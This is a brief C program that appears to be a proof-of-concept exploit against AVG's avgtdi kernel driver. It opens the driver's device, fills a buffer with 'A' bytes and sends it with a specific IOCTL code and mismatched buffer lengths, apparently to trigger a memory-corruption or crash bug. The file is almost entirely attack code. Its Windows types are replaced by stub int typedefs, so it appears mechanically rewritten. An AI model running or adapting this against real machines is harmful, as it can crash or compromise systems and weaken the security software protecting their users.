
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int LPVOID ;
typedef int HANDLE ;
typedef int DWORD ;


 int CreateFileA (char*,int,int ,int ,int ,int ,int *) ;
 int DeviceIoControl (int ,int,int ,int,int ,int,int*,int *) ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 int INVALID_HANDLE_VALUE ;
 int OPEN_EXISTING ;
 int free (void*) ;
 void* malloc (int) ;
 int memset (void*,char,int) ;
 int printf (char*) ;

int main(int argc, char **argv)
{
 HANDLE hDevice;
 DWORD cb;
 void *buff;
 int outlen = 0x18, inlen = 0x10;
 DWORD ioctl = 0x830020C8;
 char deviceName[] = "\\\\.\\avgtdi";
 char logName[] = "avgtdi.log";

 if ( (hDevice = CreateFileA(deviceName,
        GENERIC_READ|GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        0,
        ((void*)0)) ) != INVALID_HANDLE_VALUE )
 {
  printf("Device  succesfully opened!\n");
 }
 else
 {
  printf("Error: Error opening device \n");
  return 0;
 }

 cb = 0;
 buff = malloc(0x1000);
 if(!buff){
   printf("malloc failed");
   return 0;
 }
 memset(buff, 'A', 0x1000-1);



 DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff, outlen, &cb, ((void*)0));

 free(buff);
}
